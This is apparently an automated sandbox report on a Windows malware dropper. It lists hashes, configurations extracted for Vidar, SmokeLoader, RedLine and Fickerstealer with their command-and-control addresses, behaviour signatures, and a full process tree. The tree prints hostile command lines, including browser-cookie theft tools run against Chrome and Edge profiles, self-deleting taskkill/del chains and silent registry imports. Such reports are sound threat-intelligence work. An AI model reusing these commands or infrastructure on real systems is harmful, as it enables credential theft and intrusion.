Resubmissions (date, analysis ID, score)

  • 13-08-2021 10:16   210813-wpta271jdx   10
  • 08-08-2021 23:00   210808-fgs5g9pxfs   10
  • 07-08-2021 23:12   210807-g2jw1lmd4a   10
  • 07-08-2021 16:10   210807-51nhct4kfx   10
  • 06-08-2021 23:43   210806-gc2271nxwj   10
  • 06-08-2021 06:00   210806-f443x39x8a   10
  • 05-08-2021 17:08   210805-97y6banvvx   10
  • 04-08-2021 17:25   210804-hkxx2ntr8x   10
  • 04-08-2021 12:12   210804-rjbg4b4y7n   10
  • 03-08-2021 17:12   210803-r2h7ytjwqj   10

Analysis

  • max time kernel
    1802s
  • max time network
    1812s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    20-07-2021 09:44

General

  • Target

    8 (24).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

AniNEW

C2

akedauiver.xyz:80

Extracted

Family

redline

Botnet

sel16

C2

dwarimlari.xyz:80

Extracted

Family

vidar

Version

39.6

Botnet

903

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    903

Extracted

Family

fickerstealer

C2

37.0.8.225:80

Extracted

Family

vidar

Version

39.7

Botnet

865

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    865

Signatures

  • Fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 13 IoCs

    This typically indicates the parent process was compromised via an exploit or macro. In this tree the flagged parent is the Task Scheduler service host (svchost.exe -k netsvcs -s Schedule) launching C:\Users\Admin\AppData\Roaming\weaetgv, which is how a scheduled task runs its action; a scheduled task registered by the dropper is the likelier explanation here than exploitation of svchost.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • redlinestealer 8 IoCs

    RedlineStealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 5 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 19 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 19 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 55 IoCs
  • Drops file in Program Files directory 32 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The generic signature text calls this likely ransomware behaviour; in this sample the families identified are infostealers and a loader, and drive enumeration is also used for sandbox detection and for locating files to steal, so it is not on its own evidence of ransomware.

  • Program crash 14 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 34 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 11 IoCs
  • Kills process with taskkill 11 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs ping.exe 1 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1196
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
      1⤵
        PID:2472
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2868
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
          • Modifies registry class
          PID:2800
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2780
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2528
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1936
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1460
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1380
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1144
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1028
                    • C:\Users\Admin\AppData\Roaming\weaetgv
                      C:\Users\Admin\AppData\Roaming\weaetgv
                      2⤵
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5432
                    • C:\Users\Admin\AppData\Roaming\weaetgv
                      C:\Users\Admin\AppData\Roaming\weaetgv
                      2⤵
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:9932
                    • C:\Users\Admin\AppData\Roaming\weaetgv
                      C:\Users\Admin\AppData\Roaming\weaetgv
                      2⤵
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:3976
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:1016
                    • C:\Users\Admin\AppData\Local\Temp\8 (24).exe
                      "C:\Users\Admin\AppData\Local\Temp\8 (24).exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:348
                      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2712
                        • C:\Users\Admin\AppData\Local\Temp\7zS89A36714\setup_install.exe
                          "C:\Users\Admin\AppData\Local\Temp\7zS89A36714\setup_install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:3768
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c sonia_3.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1356
                            • C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_3.exe
                              sonia_3.exe
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              • Modifies system certificate store
                              PID:860
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_3.exe" & del C:\ProgramData\*.dll & exit
                                6⤵
                                  PID:7048
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /im sonia_3.exe /f
                                    7⤵
                                    • Kills process with taskkill
                                    PID:2240
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 6
                                    7⤵
                                    • Delays execution with timeout.exe
                                    PID:8116
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_2.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4012
                              • C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_2.exe
                                sonia_2.exe
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: MapViewOfSection
                                PID:1360
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_4.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1304
                              • C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_4.exe
                                sonia_4.exe
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:3532
                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:4296
                                  • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                    "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4592
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                      • Executes dropped EXE
                                      PID:348
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                      • Executes dropped EXE
                                      PID:5848
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                        PID:9204
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                          PID:10188
                                      • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                        "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:4668
                                        • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                          C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                          8⤵
                                          • Executes dropped EXE
                                          PID:4504
                                      • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                        "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                        7⤵
                                          PID:4744
                                          • C:\Windows\winnetdriv.exe
                                            "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1626775097 0
                                            8⤵
                                            • Executes dropped EXE
                                            PID:5096
                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4828
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 816
                                            8⤵
                                            • Program crash
                                            PID:748
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 844
                                            8⤵
                                            • Program crash
                                            PID:5048
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 888
                                            8⤵
                                            • Program crash
                                            PID:4664
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 964
                                            8⤵
                                            • Program crash
                                            PID:4440
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 948
                                            8⤵
                                            • Program crash
                                            PID:5348
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 960
                                            8⤵
                                            • Program crash
                                            PID:5572
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1056
                                            8⤵
                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                            • Program crash
                                            PID:5396
                                        • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                          "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5072
                                          • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                            "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                            8⤵
                                            • Executes dropped EXE
                                            PID:3572
                                        • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4232
                                          • C:\Windows\system32\WerFault.exe
                                            C:\Windows\system32\WerFault.exe -u -p 4232 -s 1012
                                            8⤵
                                            • Program crash
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4732
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_5.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2084
                                    • C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_5.exe
                                      sonia_5.exe
                                      5⤵
                                      • Executes dropped EXE
                                      PID:3792
                                      • C:\Users\Admin\Documents\F8CXXUAHN9xz_kdL4i35O1ew.exe
                                        "C:\Users\Admin\Documents\F8CXXUAHN9xz_kdL4i35O1ew.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Drops file in Program Files directory
                                        PID:4800
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "
                                          7⤵
                                            PID:4792
                                            • C:\Windows\SysWOW64\explorer.exe
                                              explorer https://iplogger.org/2LBCU6
                                              8⤵
                                                PID:4196
                                              • C:\Windows\SysWOW64\regedit.exe
                                                regedit /s adj.reg
                                                8⤵
                                                • Runs .reg file with regedit
                                                PID:5412
                                              • C:\Windows\SysWOW64\regedit.exe
                                                regedit /s adj2.reg
                                                8⤵
                                                • Runs .reg file with regedit
                                                PID:7156
                                            • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                                              "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:4548
                                          • C:\Users\Admin\Documents\LM8V1oCQZoxmcanziYtw2jb9.exe
                                            "C:\Users\Admin\Documents\LM8V1oCQZoxmcanziYtw2jb9.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:4572
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                              7⤵
                                                PID:5084
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd
                                                  8⤵
                                                    PID:3320
                                                    • C:\Windows\SysWOW64\findstr.exe
                                                      findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                      9⤵
                                                        PID:5324
                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                        Acre.exe.com k
                                                        9⤵
                                                          PID:5892
                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                            10⤵
                                                              PID:4980
                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                11⤵
                                                                  PID:4380
                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                    12⤵
                                                                    • Drops startup file
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    PID:7280
                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                      13⤵
                                                                        PID:5388
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.1 -n 30
                                                                9⤵
                                                                • Runs ping.exe
                                                                PID:7060
                                                        • C:\Users\Admin\Documents\Q00MIIqbNbJzJgphPYZ5gpA0.exe
                                                          "C:\Users\Admin\Documents\Q00MIIqbNbJzJgphPYZ5gpA0.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:4424
                                                          • C:\Users\Admin\Documents\Q00MIIqbNbJzJgphPYZ5gpA0.exe
                                                            C:\Users\Admin\Documents\Q00MIIqbNbJzJgphPYZ5gpA0.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:4968
                                                          • C:\Users\Admin\Documents\Q00MIIqbNbJzJgphPYZ5gpA0.exe
                                                            C:\Users\Admin\Documents\Q00MIIqbNbJzJgphPYZ5gpA0.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:5040
                                                          • C:\Users\Admin\Documents\Q00MIIqbNbJzJgphPYZ5gpA0.exe
                                                            C:\Users\Admin\Documents\Q00MIIqbNbJzJgphPYZ5gpA0.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:4148
                                                        • C:\Users\Admin\Documents\XrKHnmBKrRZg5o17G5WczH22.exe
                                                          "C:\Users\Admin\Documents\XrKHnmBKrRZg5o17G5WczH22.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Checks BIOS information in registry
                                                          • Checks whether UAC is enabled
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:4304
                                                          • C:\Users\Admin\AppData\Roaming\1234.exe
                                                            C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                            7⤵
                                                              PID:7944
                                                              • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                "{path}"
                                                                8⤵
  PID:6240
  • C:\Users\Admin\Documents\LCih85lMMzCkhQ35qSWcFJgp.exe
    "C:\Users\Admin\Documents\LCih85lMMzCkhQ35qSWcFJgp.exe"
    6⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    PID:4796
    • C:\Users\Admin\Documents\LCih85lMMzCkhQ35qSWcFJgp.exe
      C:\Users\Admin\Documents\LCih85lMMzCkhQ35qSWcFJgp.exe
      7⤵
      • Executes dropped EXE
      PID:4804
  • C:\Users\Admin\Documents\g1XJKeVkAdcSnI6azKnuwKvO.exe
    "C:\Users\Admin\Documents\g1XJKeVkAdcSnI6azKnuwKvO.exe"
    6⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    PID:4300
    • C:\Users\Admin\Documents\g1XJKeVkAdcSnI6azKnuwKvO.exe
      C:\Users\Admin\Documents\g1XJKeVkAdcSnI6azKnuwKvO.exe
      7⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Checks processor information in registry
      PID:1592
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /im g1XJKeVkAdcSnI6azKnuwKvO.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\g1XJKeVkAdcSnI6azKnuwKvO.exe" & del C:\ProgramData\*.dll & exit
        8⤵
        PID:7012
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im g1XJKeVkAdcSnI6azKnuwKvO.exe /f
          9⤵
          • Kills process with taskkill
          PID:5680
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 6
          9⤵
          • Delays execution with timeout.exe
          PID:5836
  • C:\Users\Admin\Documents\Ki6HIronTXRHvwm_DxUaSOrm.exe
    "C:\Users\Admin\Documents\Ki6HIronTXRHvwm_DxUaSOrm.exe"
    6⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    PID:4716
    • C:\Users\Admin\Documents\Ki6HIronTXRHvwm_DxUaSOrm.exe
      "C:\Users\Admin\Documents\Ki6HIronTXRHvwm_DxUaSOrm.exe"
      7⤵
      • Executes dropped EXE
      • Checks processor information in registry
      PID:2808
  • C:\Users\Admin\Documents\a3XA93S1fy3gZPH1Axw2zMAf.exe
    "C:\Users\Admin\Documents\a3XA93S1fy3gZPH1Axw2zMAf.exe"
    6⤵
    • Executes dropped EXE
    PID:2312
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 660
      7⤵
      • Program crash
      PID:4484
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 644
      7⤵
      • Program crash
      PID:5448
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 640
      7⤵
      • Program crash
      PID:5660
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 692
      7⤵
      • Program crash
      PID:5792
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 1080
      7⤵
      • Suspicious use of NtCreateProcessExOtherParentProcess
      • Program crash
      PID:5588
  • C:\Users\Admin\Documents\JTLJdq6SxsyUQBGX0Lf8FPTg.exe
    "C:\Users\Admin\Documents\JTLJdq6SxsyUQBGX0Lf8FPTg.exe"
    6⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    PID:5092
    • C:\Users\Admin\Documents\JTLJdq6SxsyUQBGX0Lf8FPTg.exe
      C:\Users\Admin\Documents\JTLJdq6SxsyUQBGX0Lf8FPTg.exe
      7⤵
      • Executes dropped EXE
      PID:2224
  • C:\Users\Admin\Documents\bRcgkNRZ2XdbvfFVM514zgma.exe
    "C:\Users\Admin\Documents\bRcgkNRZ2XdbvfFVM514zgma.exe"
    6⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Drops file in Windows directory
    PID:4744
    • C:\Users\Admin\Documents\bRcgkNRZ2XdbvfFVM514zgma.exe
      C:\Users\Admin\Documents\bRcgkNRZ2XdbvfFVM514zgma.exe
      7⤵
      • Executes dropped EXE
      PID:4936
  • C:\Users\Admin\Documents\ygSAhzIDffAddZbpOSiCsBe6.exe
    "C:\Users\Admin\Documents\ygSAhzIDffAddZbpOSiCsBe6.exe"
    6⤵
    • Executes dropped EXE
    PID:4896
    • C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      7⤵
      PID:6832
    • C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      7⤵
      PID:6876
    • C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      7⤵
      PID:3080
    • C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      7⤵
      PID:7968
    • C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      7⤵
      PID:6704
    • C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      7⤵
      PID:10340
    • C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      7⤵
      PID:7036
    • C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      7⤵
      PID:8856
  • C:\Users\Admin\Documents\RKup2eyRifoJjIKidGatOWcc.exe
    "C:\Users\Admin\Documents\RKup2eyRifoJjIKidGatOWcc.exe"
    6⤵
    • Executes dropped EXE
    PID:4552
    • C:\Users\Admin\Documents\RKup2eyRifoJjIKidGatOWcc.exe
      "C:\Users\Admin\Documents\RKup2eyRifoJjIKidGatOWcc.exe"
      7⤵
      • Modifies data under HKEY_USERS
      PID:9584
  • C:\Users\Admin\Documents\wcyzwGXHOD5HyQft5VHxUKjI.exe
    "C:\Users\Admin\Documents\wcyzwGXHOD5HyQft5VHxUKjI.exe"
    6⤵
    • Executes dropped EXE
    • Checks whether UAC is enabled
    PID:2196
  • C:\Users\Admin\Documents\mYn9NSlCch3gtzWvrhEchSzp.exe
    "C:\Users\Admin\Documents\mYn9NSlCch3gtzWvrhEchSzp.exe"
    6⤵
    • Executes dropped EXE
    PID:2200
  • C:\Users\Admin\Documents\VhOjovJTYThP3vzVI4Ya88j_.exe
    "C:\Users\Admin\Documents\VhOjovJTYThP3vzVI4Ya88j_.exe"
    6⤵
    • Executes dropped EXE
    PID:4704
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      7⤵
      • Executes dropped EXE
      PID:4632
      • C:\Users\Admin\AppData\Local\Temp\7zS812170B5\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS812170B5\setup_install.exe"
        8⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:3776
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c karotima_2.exe
          9⤵
          PID:5124
          • C:\Users\Admin\AppData\Local\Temp\7zS812170B5\karotima_2.exe
            karotima_2.exe
            10⤵
            • Executes dropped EXE
            PID:5312
            • C:\Users\Admin\AppData\Local\Temp\7zS812170B5\karotima_2.exe
              "C:\Users\Admin\AppData\Local\Temp\7zS812170B5\karotima_2.exe" -a
              11⤵
              • Executes dropped EXE
              PID:5592
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c karotima_1.exe
          9⤵
          PID:4808
          • C:\Users\Admin\AppData\Local\Temp\7zS812170B5\karotima_1.exe
            karotima_1.exe
            10⤵
            • Executes dropped EXE
            • Checks computer location settings
            PID:5156
